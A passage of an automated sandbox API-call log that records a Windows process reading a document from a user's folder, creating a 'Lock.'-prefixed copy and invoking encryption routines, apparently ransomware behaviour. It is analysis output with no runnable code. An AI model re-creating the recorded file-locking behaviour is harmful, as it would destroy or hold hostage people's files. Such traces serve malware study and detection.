wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0266.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0266.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0266.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.466] CryptDestroyHash (hHash=0xa870d0) returned 1 [0266.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0266.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0266.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/nuI2xgrk2vyv2-2D.pps" (normalized: "c:\\users\\fd1hvy\\documents\\nui2xgrk2vyv2-2d.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0266.467] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0266.467] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.467] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.467] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.467] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0266.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.468] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0266.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0266.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.469] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.nuI2xgrk2vyv2-2D.pps" (normalized: "c:\\users\\fd1hvy\\documents\\lock.nui2xgrk2vyv2-2d.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0266.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0266.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0266.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0266.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125d020 [0266.499] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0266.499] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0266.502] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x3e31, lpOverlapped=0x0) returned 1 [0266.503] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0266.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e31) returned 0x2f16018 [0266.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125d020 | out: hHeap=0x970000) returned 1 [0266.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0266.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e31) returned 0x2f29e58 [0266.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.509] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e31) returned 0x2f16018 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.510] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0266.510] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.510] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0266.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e31) returned 0x2f16018 [0266.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55008 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550d8 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55078 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e31) returned 0xe50048 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0266.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 